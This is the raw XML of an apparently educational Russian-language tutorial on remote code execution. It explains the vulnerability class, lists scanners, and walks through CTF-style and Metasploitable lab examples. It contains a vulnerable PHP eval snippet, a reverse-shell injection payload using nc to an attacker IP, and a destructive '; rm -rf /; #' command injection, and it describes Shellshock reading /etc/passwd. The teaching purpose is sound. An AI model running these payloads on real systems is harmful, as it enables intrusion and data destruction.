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RCE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Автор: Женин Михаил</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE (Remote code execution)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — означает удаленное выполнение кода, представляет собой тип уязвимости, который позволяет злоумышленнику выполнять произвольный код на удаленном компьютере или сервере. Это может позволить злоумышленнику получить доступ к конфиденциальной информации, изменить или удалить данные или получить контроль над системой.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Уязвимости RCE часто встречаются в программном обеспечении или веб-приложениях, которые позволяют выполнять введенные пользователем данные в виде кода. Например, веб-приложение, позволяющее пользователям загружать и запускать собственные скрипты или подключаемые модули, может быть уязвимо для RCE, если оно не проверяет или не очищает пользовательский ввод. Затем злоумышленник может загрузить и выполнить вредоносный код, потенциально получив доступ к системе или манипулируя ее поведением.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Уязвимости RCE может быть трудно обнаружить и предотвратить, поскольку они часто связаны со сложным взаимодействием между различными частями системы. Для защиты от уязвимостей RCE важно использовать методы безопасного кодирования, проводить регулярные аудиты безопасности и обновлять программное обеспечение и приложения с помощью последних исправлений безопасности.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Существует несколько инструментов, которые могут обнаруживать уязвимости RCE, в том числе:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t>Инструменты статического анализа кода, такие как Fortify Static Code Analyzer, Coverity и Checkmarx, которые могут сканировать исходный код программы и выявлять потенциальные уязвимости RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t>Инструменты динамического анализа, такие как Burp Suite, ZAP и AppScan, которые могут тестировать программу на наличие уязвимостей RCE, моделируя атаки и наблюдая за поведением программы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Инструменты тестирования на проникновение, такие как Metasploit и Core Impact, которые можно использовать для специального тестирования уязвимостей RCE, пытаясь использовать их и проверять их существование.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t>Сканеры сетевой безопасности, такие как Nessus и OpenVAS, которые могут сканировать сеть и выявлять потенциальные уязвимости RCE в системах и приложениях, подключенных к ней.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В дополнение к этим инструментам для обнаружения уязвимостей RCE также можно использовать ручное тестирование и проверку кода. Важно использовать комбинацию этих инструментов и методов, чтобы убедиться, что все потенциальные уязвимости RCE идентифицированы и устранены.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Использование уязвимостей RCE в соревновании CTF может быть сложной задачей, поскольку требует глубокого понимания уязвимостей безопасности, создания полезной нагрузки и других сложных тем. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Шаги по поиску </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t>Определите уязвимость, изучив описание проблемы, запустив сканеры уязвимостей или другие инструменты или вручную протестировав приложение или систему.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t>Создайте полезную нагрузку, которая использует уязвимость, предоставив пользовательский ввод, который будет выполняться как код, что позволит вам выполнять произвольный код в системе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Выполните полезную нагрузку, предоставив ее в качестве входных данных для приложения или системы либо через пользовательский интерфейс, либо с помощью инструмента, такого как интерфейс командной строки или сетевой сканер.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t>Убедитесь, что полезная нагрузка выполнена успешно, проверив ожидаемые результаты, такие как новая учетная запись пользователя с правами администратора, измененные или удаленные данные или доступ к конфиденциальной информации.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Пример 1. Эксплуатация RCE с использованием инъекции кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>На сайте присутствует такой код:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="709" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="4078F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  $name=$_GET[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="50A14F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"param"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="709" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="4078F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E45649"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
        <w:br/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E45649"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;Yousend: &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E45649"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
        <w:br/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E45649"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="4078F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> @</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="A626A4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="50A14F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="50A14F"/>
        </w:rPr>
        <w:t>";"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E45649"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
        <w:t>&gt;</w:t>
        <w:br/>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E45649"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383A42"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="709" w:hanging="0"/>
        <w:jc w:val="left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Видно, что реализован он через функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">eval, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">а переданные пользователем данные попадают в нее без валидации — это позволит передавать PHP код, и он выполнится. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Запускаем обратный шелл на атакуемом узле, который будет подключаться к атакующему.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Вначале в Kali Linux откроем порт на прослушивание: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893820" cy="350520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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Далее подключаемся к порту 6666. Для этого передадим такой запрос:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">handler.PHP?param=text;passthru('nc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="986801"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.56.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="986801"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/sh');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В результате получим подключение к узлу атакующего со стороны сервера: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556760" cy="147066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Шелл будет действовать даже после закрытия страницы. Далее можно закрепиться в системе, поднять свои права или использовать более продвинутый сценарий эксплуатации.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Пример 2. Эксплуатация RCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Одним из примеров уязвимости RCE является уязвимость Shellshock, затрагивающая оболочку Bash, которая обычно используется во многих операционных системах. Эта уязвимость позволяла злоумышленнику выполнять произвольные команды в системе, отправляя специально созданные запросы в оболочку Bash.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Вот пример того, как злоумышленник может использовать уязвимость Shellshock для выполнения произвольного кода в целевой системе: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525135" cy="62865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В этом примере злоумышленник использует команду curl для отправки вредоносного запроса в оболочку Bash в целевой системе. Запрос содержит код, который при выполнении позволяет злоумышленнику прочитать файл /etc/passwd в системе.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Пример 3. Эксплуатация RCE в настольных приложениях</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5940425" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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В этом коде программа считывает ввод из аргументов командной строки и выполняет его как команду с помощью функции system. Это создает уязвимость RCE, поскольку пользователь может ввести любую команду, которую он хочет, и она будет выполнена программой, потенциально позволяя пользователю выполнять произвольный код в системе.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Например, если злоумышленник вводит в качестве аргумента следующую команду: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501650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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Программа выполнит команду "; rm -rf /; #", которая удалит все файлы и каталоги в системе. Это может привести к серьезным повреждениям и поставить под угрозу безопасность системы.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Пример 4. Эксплуатация RCE в виртуальной машине </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Допустим, есть страница, которая позволяет получить имя хоста по адресу или наоборот.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680710" cy="2598420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При этом есть подозрение, что страница подвержена RCE, так как в основе приложения лежит выполнение команды ОС. Для проверки попробуем отправить несколько команд, разделив их символом «;»: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86145" cy="2758440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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360" w:before="0" w:after="160"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Видим, что последовательно выполняются две команды — значит, инъекция команд возможна. Можно получить на удаленном хосте шелл с правами пользователя www-data.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39ca"/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="16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a4f8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fa4f85"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hljscomment" w:customStyle="1">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f85"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hljskeyword" w:customStyle="1">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f85"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hljsvariable" w:customStyle="1">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f85"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hljsstring" w:customStyle="1">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f85"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hljstitle" w:customStyle="1">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f85"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hljstype" w:customStyle="1">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f85"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hljsoperator" w:customStyle="1">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fa4f8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9b03c9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a4f8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LibreOffice/7.3.1.3$Linux_X86_64 LibreOffice_project/30$Build-3</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>6</Pages>
  <Words>782</Words>
  <Characters>5284</Characters>
  <CharactersWithSpaces>6034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2022-12-09T21:05:00Z</dcterms:created>
  <dc:creator>Stanley| William Walker</dc:creator>
  <dc:description/>
  <dc:language>ru-RU</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-10T14:30:18Z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